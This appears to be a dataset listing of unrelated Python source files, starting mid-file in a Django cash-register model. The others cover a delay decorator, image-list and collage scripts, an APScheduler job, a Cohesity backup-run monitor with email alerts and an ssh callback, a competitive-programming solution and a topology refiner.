        return "[{}] : {}".format(self.register_count, self.difference)
class ClosingCountDifference(models.Model):
    """Unattributable difference found when a whole sales period closes."""
    # Difference that can occur when a sales period closes. Since this could have any reason, it cannot be pointed to
    # a single register. This makes it different from an OpeningCountDifference
    difference = MoneyField()
    sales_period = models.ForeignKey("SalesPeriod", on_delete=models.PROTECT)
class InactiveError(Exception):
    """Raised when opening a register that is not active."""
    pass
class AlreadyOpenError(Exception):
    """Raised when opening a register that is already open."""
    pass
class AlreadyClosedError(Exception):
    """Raised when closing a register/sales period that is already closed."""
    pass
class InvalidOperationError(Exception):
    """Raised for operations not allowed in the current state."""
    pass
class InvalidDenominationList(Exception):
    """Raised when denomination counts do not match the expected set/total."""
    pass
class InvalidRegisterError(Exception):
    """Raised for operations on an unsuitable register."""
    pass
class CurrencyTypeMismatchError(Exception):
    """Raised when a cash register is saved with a non-cash payment type."""
    pass
class NegativeCountError(Exception):
    """Raised when a denomination count is negative."""
    pass
class RegisterCountError(Exception):
    """Raised when denomination amounts do not add up to the counted total."""
    pass
class RegisterInconsistencyError(Exception):
    """Raised when a non-cash register receives denomination counts."""
    pass
class InvalidInputError(Exception):
    """Raised when supplied counts do not belong to the expected register."""
    pass
class SalesPeriodCloseError(Exception):
    """Aggregate of the individual errors found while closing a sales period."""

    def __init__(self, errors):
        super(SalesPeriodCloseError, self).__init__()
        self.errors = errors

    def __str__(self):
        # Concatenate the string form of every collected error.
        return "".join(str(error) for error in self.errors)
|
nilq/baby-python
|
python
|
import threading
from functools import wraps
def delay(delay=0.):
    """
    Decorator delaying the execution of a function for a while.
    """
    def wrap(f):
        @wraps(f)
        def delayed(*args, **kwargs):
            # Hand the call off to a timer thread. Note the caller receives
            # neither the Timer handle nor the function's return value.
            threading.Timer(delay, f, args=args, kwargs=kwargs).start()
        return delayed
    return wrap
|
nilq/baby-python
|
python
|
# Build train/val image list files: every image in the train directory except
# those named in dont_include_to_train.txt, and every test image.
#
# Fixes: ``name.strip(".json")`` strips a *character set* ('.', 'j', 's', 'o',
# 'n') from both ends, mangling names such as "notes.json" -> "tes"; the
# extension is now removed as a proper suffix. The redundant ``close()`` calls
# inside the ``with`` blocks are gone — the context manager closes the files.
train_imgs_path = "path_to_train_images"
test_imgs_path = "path_to_val/test images"
import os

dnt_names = []
with open("dont_include_to_train.txt", "r") as dnt:
    for name in dnt:
        base = name.strip()
        if base.endswith(".json"):
            base = base[:-len(".json")]
        dnt_names.append(base)
print(dnt_names)
with open("baseline_train.txt", "w") as btr:
    for file in os.listdir(train_imgs_path):
        if file not in dnt_names:
            btr.write(train_imgs_path + file + "\n")
with open("baseline_val.txt", "w") as bv:
    for file in os.listdir(test_imgs_path):
        bv.write(test_imgs_path + file + "\n")
|
nilq/baby-python
|
python
|
import datetime
import time
import pandas as pd
from apscheduler.schedulers.background import BackgroundScheduler
from django_apscheduler.jobstores import DjangoJobStore, register_events, register_job
from django_apscheduler.models import DjangoJob, DjangoJobExecution
# from django_pandas.io import read_frame
from BiSheServer.settings import BASE_LOG_DIR, LOG_SUFFIX
from api import upload_log
# Start the scheduled work: a daily task executed at a fixed time.
scheduler_plan = BackgroundScheduler()  # instantiate the scheduler
try:
    # Fetch all previously registered jobs/executions so they can be cleared.
    dje = DjangoJobExecution.objects.all()
    dj = DjangoJob.objects.all()
    # Check whether this job is already registered.
    dj_rs = dj.filter(id="task_time")
    if dj_rs.exists():
        dj_rs = dj_rs.first()
        # If the job's next scheduled run time already passed while we were
        # down, trigger the upload immediately (for the previous day's log
        # suffix).
        if int(time.mktime(dj_rs.next_run_time.timetuple())) < int(time.time()):
            upload_log.upload_hadoop_log_thread(suffix=(dj_rs.next_run_time + datetime.timedelta(days=-1))
                                                .strftime(LOG_SUFFIX))
    djePd = pd.DataFrame(list(dje.values()))
    djPd = pd.DataFrame(list(dj.values()))
    if not djePd.empty:
        # If there are execution records, archive them to a file before
        # truncating the job tables.
        crontab_log_path = BASE_LOG_DIR + "/crontab.log"
        djPd.to_csv(crontab_log_path, mode='a', index=True, sep='\t', encoding='utf_8_sig')
        with open(crontab_log_path, "a") as f:
            f.write("\n")  # the with-statement closes the file; no explicit f.close() needed
        djePd.to_csv(crontab_log_path, mode='a', index=True, sep='\t', encoding='utf_8_sig')
        with open(crontab_log_path, "a") as f:
            f.write("\n\n")  # the with-statement closes the file; no explicit f.close() needed
        dje.delete()
        dj.delete()
    # With the job tables cleared, register the job again.
    # The scheduler persists jobs through DjangoJobStore().
    scheduler_plan.add_jobstore(DjangoJobStore(), "default")
    # 'interval' mode would run every 15 minutes;
    # 'cron' mode runs on fixed days/times (e.g. Mon-Fri at 9:30:10);
    # id is the job identifier used as the registration marker.
    # Alternative schedules kept for reference:
    # @register_job(scheduler_plan, "interval", minutes=15)
    # @register_job(scheduler_plan, 'cron', day_of_week='mon-sun', hour='20', minute='3', second='1', id='task_time')
    # @register_job(scheduler_plan, "interval", minutes=1, replace_existing=True)
    @register_job(scheduler_plan, 'cron', day_of_week='mon-sun', hour='0', minute='1', second='1', id='task_time',
                  replace_existing=True)
    def my_job():
        # The actual daily task: upload the Hadoop log.
        upload_log.upload_hadoop_log_thread(suffix="")
        # pass
    register_events(scheduler_plan)
    scheduler_plan.start()
except Exception as e:
    print(e)
    # On any error, stop the scheduler.
    scheduler_plan.shutdown()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""monitorTasks: wait for a new run of a protection job, watch each
source's pulse log for a key string, email an alert on timeout, and
finally run a callback script over ssh."""
# usage: ./monitorTasks.py -v ve2 -u admin -j 54334 -k 'Starting directory differ' -t 120
# import pyhesity wrapper module
from pyhesity import *
from time import sleep
from datetime import datetime
import os
import smtplib
import email.message
import email.utils
# command line arguments
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--vip', type=str, required=True)  # cluster to connect to
parser.add_argument('-u', '--username', type=str, required=True)  # username
parser.add_argument('-d', '--domain', type=str, default='local')  # (optional) domain - defaults to local
parser.add_argument('-j', '--jobid', type=int, required=True)  # job ID to monitor
parser.add_argument('-n', '--jobname', type=str, required=True)  # job name (used in the alert email)
parser.add_argument('-k', '--keystring', type=str, required=True)  # string to find in pulse log
parser.add_argument('-o', '--timeoutsec', type=int, required=True)  # seconds until we alert and bailout
parser.add_argument('-c', '--callbackuser', type=str, required=True)  # user@target to run callback script
parser.add_argument('-b', '--callbackpath', type=str, required=True)  # path of the callback script on the target
parser.add_argument('-s', '--mailserver', type=str)
parser.add_argument('-p', '--mailport', type=int, default=25)
parser.add_argument('-t', '--sendto', action='append', type=str)
parser.add_argument('-f', '--sendfrom', type=str)
args = parser.parse_args()
vip = args.vip
username = args.username
domain = args.domain
jobid = args.jobid
jobname = args.jobname
keystring = args.keystring
timeoutsec = args.timeoutsec
callbackuser = args.callbackuser
callbackpath = args.callbackpath
mailserver = args.mailserver
mailport = args.mailport
sendto = args.sendto
sendfrom = args.sendfrom
# authenticate
apiauth(vip, username, domain)
# track seconds passed
s = 0
# count tasks where preprocess is finished
x = 0
preprocessFinished = True  # NOTE(review): written below but never read
# new job run startTime should be in the last 60 seconds
now = datetime.now()
nowUsecs = dateToUsecs(now.strftime("%Y-%m-%d %H:%M:%S"))
startTimeUsecs = nowUsecs - 60000000  # one minute ago, in microseconds
# get latest job run
run = None
print("waiting for new run...")
while run is None and s < timeoutsec:
    try:
        run = api('get', 'protectionRuns?jobId=%s&numRuns=1&startTimeUsecs=%s' % (jobid, startTimeUsecs))[0]
        runStartTimeUsecs = run['backupRun']['stats']['startTimeUsecs']
        # create a flag file for this run so we only run once
        if not os.path.exists(str(runStartTimeUsecs)):
            f = open(str(runStartTimeUsecs), 'w')
            f.write(str(runStartTimeUsecs))
            f.close()
        else:
            # flag file already exists: another instance handled this run
            exit()
        stats = run['backupRun']['sourceBackupStatus']  # NOTE(review): unused
        if run:
            print("found new run")
    except Exception as e:
        # no (or malformed) run yet -- keep polling
        run = None
    sleep(1)
    s += 1
# wait until all tasks are finished preprocessing
# NOTE(review): if no new run appeared before the timeout, `run` is still
# None here and the loop condition below raises TypeError -- consider
# exiting with an error in that case.
print("monitoring tasks...")
while x < len(run['backupRun']['sourceBackupStatus']) and s < timeoutsec:
    sleep(1)
    s += 1
    if s > timeoutsec:
        break
    x = 0
    for source in run['backupRun']['sourceBackupStatus']:
        # get task monitor per source
        task = api('get', '/progressMonitors?taskPathVec=%s' % source['progressMonitorTaskPath'])
        try:
            # get pulse log messages
            eventmsgs = task['resultGroupVec'][0]['taskVec'][0]['progress']['eventVec']
            foundkeystring = False
            # check for key string in event messages
            for eventmsg in eventmsgs:
                if keystring in eventmsg['eventMsg']:
                    foundkeystring = True
            if foundkeystring is True:
                x += 1
            else:
                preprocessFinished = False
        except Exception as e:
            # progress monitor not available yet for this source -- skip it
            pass
if x >= len(run['backupRun']['sourceBackupStatus']):
    # we're good
    print('preprocessing complete')
else:
    # we timed out - send an alert email
    print('we timed out')
    print('Sending report to %s...' % ', '.join(sendto))
    msg = email.message.Message()
    msg['Subject'] = "thaw timeout %s" % jobname
    msg['From'] = sendfrom
    msg['To'] = ','.join(sendto)
    msg.add_header('Content-Type', 'text')
    msg.set_payload("thaw timeout %s" % jobname)
    smtpserver = smtplib.SMTP(mailserver, mailport)
    smtpserver.sendmail(sendfrom, sendto, msg.as_string())
    smtpserver.quit()
# regardless - call the thaw script
os.system("ssh -t %s %s" % (callbackuser, callbackpath))
|
nilq/baby-python
|
python
|
from graphite_feeder.handler.appliance.socket import energy_guard, presence
|
nilq/baby-python
|
python
|
# https://atcoder.jp/contests/abc077/tasks/arc084_a
# Read the three size-N part lists; the top (a) and bottom (c) lists are
# kept sorted so the binary searches below apply.
N = int(input())
a_arr = sorted(map(int, input().split()))
b_arr = list(map(int, input().split()))
c_arr = sorted(map(int, input().split()))
def find_least_idx(num: int, lst: list) -> int:
    """Binary search for the smallest index i with lst[i] > num.

    Assumes lst is sorted ascending. When no element exceeds num the
    last index (len(lst) - 1) is returned.
    """
    lo, hi = 0, len(lst) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if lst[mid] > num:
            hi = mid        # lst[mid] qualifies; tighten the upper bound
        else:
            lo = mid + 1    # everything up to mid is too small
    return hi
def find_most_idx(num: int, lst: list) -> int:
    """Binary search for the largest index i with lst[i] < num.

    Assumes lst is sorted ascending. When no element is smaller than
    num, index 0 is returned.
    """
    lo, hi = 0, len(lst) - 1
    while lo < hi:
        # Upper-biased midpoint so that `lo = mid` always makes progress.
        mid = (lo + hi) // 2 + 1
        if lst[mid] < num:
            lo = mid
        else:
            hi = mid - 1
    return lo
# Count the valid (top, middle, bottom) triples: for each middle part b,
# multiply how many tops are strictly smaller by how many bottoms are
# strictly larger.
total = 0
for b in b_arr:
    # No usable top below b, or no usable bottom above b.
    if b <= a_arr[0] or b >= c_arr[N - 1]:
        continue
    tops = find_most_idx(b, a_arr) + 1          # parts strictly smaller than b
    bottoms = N - find_least_idx(b, c_arr)      # parts strictly larger than b
    total += tops * bottoms
print(total)
|
nilq/baby-python
|
python
|
from refiner.generic.refiner import Refiner
from topology.communication import Communication
from topology.node import Node, Direction
from topology.microToscaTypes import NodeType, RelationshipProperty
from topology.protocols import IP
import ipaddress
import copy
class DynamicDiscoveryRecognizer(Refiner):
    """Refiner that tags interact-with relationships that appear to use
    dynamic discovery: when a node reaches the same adjacent node at
    more than one IP address across its communications, the edge gets
    the dynamic-discovery relationship property."""
    def __init__(self):
        pass
    @classmethod
    def recognize(cls, nodes: dict, args: dict):
        """Scan every node's outgoing microTosca edges and add
        MICROTOSCA_RELATIONSHIPS_INTERACT_WITH_DYNAMIC_DISCOVERY_PROPERTY
        where the peer was observed at differing IP addresses.

        nodes -- mapping of node name -> Node.
        args  -- unused here (part of the Refiner classmethod interface).
        """
        for nodeName, node in nodes.items():
            # Message routers are skipped as sources.
            if node.getType() is NodeType.MICROTOSCA_NODES_MESSAGE_ROUTER:
                continue
            edges = node.getEdges(Direction.OUTGOING)
            for adjacentName in edges.keys():
                # Skip router targets and edges outside the microTosca model.
                if nodes[adjacentName].getType() is NodeType.MICROTOSCA_NODES_MESSAGE_ROUTER or not node.getIsMicroToscaEdge(adjacentName):
                    continue
                communications = node.getCommunications(adjacentName)
                ipAddress = ''  # first peer IP observed for this adjacency
                for communication in communications:
                    protocol = communication.getNetworkLayer()
                    actualIP = ''
                    # The peer's IP is the receiver IP when this node sent,
                    # and the sender IP when this node received.
                    if 'ip' in protocol and nodeName == protocol['ip'].getSenderHost():
                        assert adjacentName == protocol['ip'].getReceiverHost()
                        actualIP = copy.deepcopy(str(protocol['ip'].getReceiverIP()))
                    elif 'ip' in protocol and nodeName == protocol['ip'].getReceiverHost():
                        assert adjacentName == protocol['ip'].getSenderHost()
                        actualIP = copy.deepcopy(str(protocol['ip'].getSenderIP()))
                    if ipAddress == '':
                        ipAddress = actualIP
                    elif actualIP and actualIP != ipAddress:
                        # Two different IPs for the same peer: presumably the
                        # peer is resolved dynamically -- tag the edge once
                        # and stop scanning this adjacency.
                        node.addRelationshipProperty(adjacentName, RelationshipProperty.MICROTOSCA_RELATIONSHIPS_INTERACT_WITH_DYNAMIC_DISCOVERY_PROPERTY)
                        break
|
nilq/baby-python
|
python
|
import __init__
from rider.utils.commands import main
main()  # run the rider command-line entry point (imported above from rider.utils.commands)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# Paulo Cezar, Maratona 2016, huaauhahhuahau
# Keep only the vowels of the input line and test them for palindromy.
vowels = [ch for ch in input() if ch in "aeiou"]
print("S" if vowels == vowels[::-1] else "N")
|
nilq/baby-python
|
python
|
# Build a horizontal collage of two images using PIL and numpy.
from PIL import Image
import numpy as np

# Open the source images (fill in the image paths).
img1 = Image.open("")
img2 = Image.open("")  # BUGFIX: was `Imgae.open`, a NameError at runtime
# Convert both images to numpy arrays.
img1_array = np.array(img1)
img2_array = np.array(img2)
# Arrange the two arrays side by side in a single row.
# NOTE(review): np.hstack requires both images to share the same height
# and channel count -- confirm the inputs match.
imgg = np.hstack([img1_array, img2_array])
# Turn the combined array back into an image.
final_img = Image.fromarray(imgg)
# Provide the destination path where the collage should be saved.
final_img.save("")
print("Image saved")
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.